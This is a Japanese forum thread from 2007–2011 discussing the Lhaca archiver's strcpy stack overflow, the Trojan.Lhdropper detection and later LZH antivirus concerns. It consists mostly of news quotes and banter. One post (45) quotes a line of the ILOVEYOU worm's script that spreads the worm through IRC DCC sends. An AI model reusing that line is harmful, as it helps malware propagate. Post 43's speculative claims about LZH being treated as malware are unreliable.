【Lhdropper】LHAの危険が危ない

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
シマンテックは26日、Lhaca デラックス版バージョン1.20に脆弱性があり、同アーカイバで
作成されたLZHファイルはトロイの木馬「Trojan.Lhdropper」として検出されると警告した。

発表によると、Lhaca デラックス版バージョン1.20で作成したLZHファイルには複数のNOP
スレッド、シェルコードに似たコードブロック、暗号解読用コード、エンコードされた実行
ファイルが含まれ、同アーカイバがインストールされた日本語版Windows XP上で実行した
場合、WindowsのSystemフォルダにバックドアが作成される。その後、別のLZHファイルが
実行され、無害な一太郎ドキュメントが解凍される。

シマンテックによると、文字列長の確認を適切に行わないstrcpy()の呼び出しが原因で、
重要なスタックメモリーが上書きされる恐れがあるため制御がシェルコードに移行するとの
ことだ。


RBB TOODAY http://www.rbbtoday.com/news/20070626/42986.html
2名無しさん@お腹いっぱい。:2007/06/27(水) 17:43:01
ttp://internet.watch.impress.co.jp/cda/news/2007/06/27/16170.html
脆弱性が指摘された「+Lhaca」の修正版が公開



昨日の時点で既に修正版が公開されてる
情報古すぎだろ
3名無しさん@お腹いっぱい。:2007/06/27(水) 17:43:35
LHA(゚听)イラネ
4名無しさん@お腹いっぱい。:2007/06/27(水) 17:50:10
lha(笑)
5名無しさん@お腹いっぱい。:2007/06/27(水) 17:52:03
>>2
怖くないか?

 同アーカイバで作成されたLZHファイルはトロイの木馬「Trojan.Lhdropper」として検出されると警告した。
6名無しさん@お腹いっぱい。:2007/06/27(水) 18:38:20
スレタイは狙ったのか?
7名無しさん@お腹いっぱい。:2007/06/27(水) 19:34:54
危険が危ない?日本語でおk
8名無しさん@お腹いっぱい。:2007/06/27(水) 21:35:24
不覚にもワ(ry
9名無しさん@お腹いっぱい。:2007/06/27(水) 22:59:03
頭が頭痛
10名無しさん@お腹いっぱい。:2007/06/27(水) 23:04:15
腹が腹痛
11名無しさん@お腹いっぱい。:2007/06/27(水) 23:08:39
先日学校でもらった保健だよりに

 6月30日 検便検査 

って書いてあったけど、「検便」という単語自体に
「便を検査する」っていう意味があるから
後ろに「検査」とつけるのはおかしいと思ふ。
12名無しさん@お腹いっぱい。:2007/06/27(水) 23:17:44
ここは勉強になるインターネットですね
13名無しさん@お腹いっぱい。:2007/06/27(水) 23:22:02
>>11
そんなことよりいまどき検便やらせる学校が存在することに驚き
14名無しさん@お腹いっぱい。:2007/06/28(木) 01:41:43
好きな子が検便で引っかかったら悲しいよな。
15名無しさん@お腹いっぱい。:2007/06/28(木) 05:08:58
>>11
では 便検査 が正解ですかな。
16名無しさん@お腹いっぱい。:2007/06/28(木) 05:27:33
調理師の学校とかならありえそう。
17名無しさん@お腹いっぱい。:2007/06/28(木) 05:30:23
なんてことを書きに来た訳じゃない、>>1を読む限りトロイ作成機だったようにも取れるけど
どういうことなの?
18名無しさん@お腹いっぱい。:2007/06/28(木) 08:18:06
>>5
誤訳だろ?

誤訳でなかったら、Wordに脆弱性があるので、それで作ったdocを全てウイルスと見なします!!!
って言ってるのと同じ。

19名無しさん@お腹いっぱい。:2007/06/28(木) 15:28:48
Lhacaだけ?
漏れのLhaplusはOK?
20名無しさん@お腹いっぱい。:2007/06/28(木) 15:34:00
シラネエヨ
21名無しさん@お腹いっぱい。:2007/06/28(木) 19:37:14
lh*** ってのは殆どアウトらしい
22名無しさん@お腹いっぱい。:2007/06/28(木) 22:40:55
23名無しさん@お腹いっぱい。:2007/06/29(金) 01:16:04
Lhazの作者も同様の欠陥がLhazに存在する可能性を示唆していたな
2423:2007/06/29(金) 01:20:15
まあ、出所不明のファイルはLZHに限らず開くなっつーことだな
25名無しさん@お腹いっぱい。:2007/06/29(金) 01:20:48
いわゆる一つの「夢のドリーム」「スターの星」ですねぇ
26名無しさん@お腹いっぱい。:2007/07/01(日) 22:16:14
ttp://www.itmedia.co.jp/enterprise/articles/0707/01/news002.html
修正したばかりの+Lhacaにまた脆弱性、新たな修正版をリリース

このほど脆弱性が指摘され、修正版が公開されたばかりの圧縮・解凍ソフトウェア
「+Lhaca」に新たな脆弱性が発見された。

発見された脆弱性は、スタックバッファオーバーフローを引き起こす可能性があり、
この脆弱性を悪用したLZH圧縮ファイルを処理すると、アプリケーションを
クラッシュさせたり、任意のコード実行が可能になるという。

新たに公開された「+Lhaca Version 1.23」では、LHA展開処理内に存在したstrcpyを
strncpyに変更し、バッファオーバーフローを発生させないようにした。
作者によれば、詳細な動作確認を終えた後に正式版にするとしている。
27名無しさん@お腹いっぱい。:2007/07/02(月) 01:17:02
また脆弱性が見つかったのか・・・
28名無しさん@お腹いっぱい。:2007/07/02(月) 17:31:25
RARの扱いにも問題あるし、元から駄目なものがいよいよ駄目だな
29名無しさん@お腹いっぱい。:2008/01/16(水) 13:44:14
    「「 テロ特措法、戦争参加を決定しても何も変らない人々。 」」
 日本人は既に平和国家の国民とは言えない。私は気付いてはいたが現実にこの
現象を知ることで日本人の無情と日本人の無常を強く感じ、日本がこの先どのように
変っていくのか予測する事が怖い。
 無情とは感情が無いと言うことではなく。人間としての感情が無くなるということでは
ないか。日本人はテロ特措法により、これから貧しい人々を殺す仲間に入り人々の
魂を破壊し、現政権の指導者である父が人の命は地球より重いと述べたのは平和国家
の指導者で無ければ決して言う事が出来ない言葉であり、それは人間としての情では
無いでしょうか。私は地球の重さを知ろうとは思わないがその指導者が言おうとしている
ことは十分に分かる。それは平和国家の人間として、そして、世界平和を望む人間と
して平和憲法以上の価値のある言葉ではないだろうか。もし、今の指導者が自分の
父の言葉を理解しているのならばテロ特措法を世界平和協力とは言わないだろうし、
戦争に参加をし戦艦に給油する自衛隊員が武力行使には成らないと冗談のような、
寝言のような、ボケ老人のたわごとのような、父親の言葉と比較したら正に地球と
人の目方ほどの違いがある迷言ではないか。平和を求めた父と平和ボケした息子の
違いは比較にならない夢のごとき出来事のように感じる。いつしかこの親子もあの世で
再会するだろうが多分、父親はこの子供を勘当するのでは無いだろうか。その時の
言葉を想像するとこんな言葉が適当ではないだろうか。「お前は俺の顔に泥を塗って
嬉しいのか。俺は人の命を奪ったことはない。そして、お前に人の命を奪えと教えた事も
ない。それなのにお前は人を殺し、日本人だけの命を守ろうとした。その上、それが
世界平和協力と嘯いたことでこの黄泉の世界で私の立場は地に落ちた。お前は私が
死んでまでも私を恨んでいたのか、何て親不孝者なのだ。私はお前のような子供の
親として情けない。お前の顔なんて見たくはない。」別に私があの世の親子の会話を
想像することは無いのだが、同じような顔して可哀想な親子なんだなと勝手に思ってしまう。
30名無しさん@お腹いっぱい。:2009/08/10(月) 23:59:51
危険があぶない
31名無しさん@お腹いっぱい。:2010/06/06(日) 21:51:56
32名無しさん@お腹いっぱい。:2010/06/07(月) 11:11:01
LHAの問題を解決するために尽力を尽くします
33名無しさん@お腹いっぱい。:2010/06/07(月) 11:12:27
かつてNOD32がLZH対応してないからと騒いでた連中はなんだったのか
NOD32にまるで非はなかったのである
34名無しさん@お腹いっぱい。:2010/06/07(月) 14:12:17
IPAがウンコ
早く仕分け対象になればいいのに
35名無しさん@お腹いっぱい。:2010/06/07(月) 14:30:33
900 名前:名無しさん@お腹いっぱい。 [age] 投稿日:2010/06/07(月) 13:38:26 ID:8201hj/g0
現在のまとめ

* LZH 形式は国際的に見るとマイナー。
* 故に、アンチウィルスソフトが真面目に対応してくれないことがある。
* 実際、問題があるケースがあるんで、Micco 氏としては、きちんと直して欲しいと思っている。
* なぜなら、きちんと対応してもらわないと、LZH 形式がマルウェアの入れ物として使われることになる。UnLHA をメンテナンスをする者として、自分の子供が悪の片棒担いでいる、という状況は許しがたい(と思っているだろうという、私の勝手な想像)。
* だから、IPA に報告しているんだけど、受理してもらえない。
* IPA に受理してもらえない状況で、アンチウィルスソフトの各メーカーが自主的に対処してもらえる可能性が低い(実際、対応は進んでいない)。
* 故に、利用の中止を呼びかけることにした。
* 利用中止を呼びかけているのに、開発を続けるのは矛盾するので(というか、自分で利用中止を呼びかけているソフトウェアに対して、開発を継続するモチベーションを維持する、というのは、ちょっと考えられない)、開発も中止する。
* でも、バグは使っている人に迷惑をかけることになるから、バグの修正だけは続ける。
36名無しさん@お腹いっぱい。:2010/06/07(月) 18:52:04
EICARのようなテストウィルスをケースバイケースで作れないのかね・・・
日本では、古くからLHAが使われて来たんだから捨てるのはしのびない
ウイルスソフトをテストして対応してくれるベンダーだけ使いたい
37名無しさん@お腹いっぱい。:2010/06/07(月) 22:16:21
割と最近かかわったシステムでも、バッチ処理の途中でLHAかまして
日々ログを圧縮してるものがあったは・・移行が面倒くさいな。

38名無しさん@お腹いっぱい。:2010/06/08(火) 00:00:44
Windows Meに圧縮フォルダとしてZIP形式が使われた時点で
ZIPがスタンダードになったんだよ。
39名無しさん@お腹いっぱい。:2010/06/08(火) 09:01:51
ランダムに複数の圧縮形式を使って実行ファイルを圧縮してるウイルスが
LZHを合間に挟んで使ったら割とどうしようもないな
40名無しさん@お腹いっぱい。:2010/06/09(水) 20:30:59
スレが静かな静寂すぎて不気味だ
41名無しさん@お腹いっぱい。:2010/06/25(金) 10:36:57
[JVNVU#545953: 複数のアンチウィルス製品に脆弱性]
http://jvn.jp/cert/JVNVU545953/
2010/06/24
>JPCERT/CC からの補足情報を追加しました。

>本件は、アンチウイルス製品の脆弱性であり、圧縮アーカイバ製品や圧縮形式の脆弱性ではありません。
>なお、CERT-FI のアドバイザリには、発見者が本脆弱性を発見した際に調査を行った圧縮形式として、ZIP, CAB, GZIP, 7Z および RAR が記載されていますが、これら 5形式のみならず LZH や ACE など、他の圧縮形式でも同じ問題が発生する可能性があります。
42名無しさん@お腹いっぱい。:2010/06/25(金) 16:07:51
脆弱性の拡大が拡がっている
43名無しさん@お腹いっぱい。:2010/06/28(月) 16:17:59
海外ではLZH書庫自体をほとんどサポートされてなかったからな
JVN、IPAが受理されないのはLHAそのものがバッドウェアと思っていると推測できる
JVN、IPAはLZH自体をウィルスやマルウェアと同じ扱いにしているようだ
今回の発言は作者自身が「LHAはバッドウェアでした」と認めたようなものだな
UNLHA32.DLLの作者はLZHをウィルスやマルウェアに認定されても仕方がないと思っているそうだな

LZHは中途半端な形式だったな
ちなみに元になったのはLHA.EXEでv2.67.00が最新ベータ版のようだ(nifty限定で当然ソースは公開されていない)
その後LHA.EXEの作者は夜逃げするように開発を放棄した(終了宣言してソース公開すれば引き続き誰かが開発していた)
当然新機能は付かなかった(lh9形式やパスワード機能なで)もちろんUNLHA32.DLLも新たな機能は付いていない
もう1つ別の作者の偽LHA.EXEがあるがこちらはUNLHA32.DLLを使用する

すでにベクターではLHAを拒否することになったな
今後書庫ソフトからLZH対応をはずす動きもありそうだな
さらに一部の海外ベンダーがLZH書庫やLHA関連プログラムをウィルス マルウェアとして検知される可能性も考えられる
最悪の場合LZH書庫自体ウィルスとして扱う可能性がある(ウィルスが仕込まれてなくてもLZH書庫と判明した地点でウィルスして検知される)
やはり別の形式に圧縮しなおした方がいいかも

ついでにオンラインソフトを管轄する団体(日本オンラインソフト協会や日本フリーソフト協会)がないからな
44名無しさん@お腹いっぱい。:2010/08/17(火) 12:44:10
>43
lharcに触れてない時点で論外
45名無しさん@お腹いっぱい。:2011/01/09(日) 20:21:40
Scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
46 忍法帖【Lv=40,xxxPT】(7+0:8) 【21.6m】 電脳プリオン ◆3YKmpu7JR7Ic
ほとんど使わん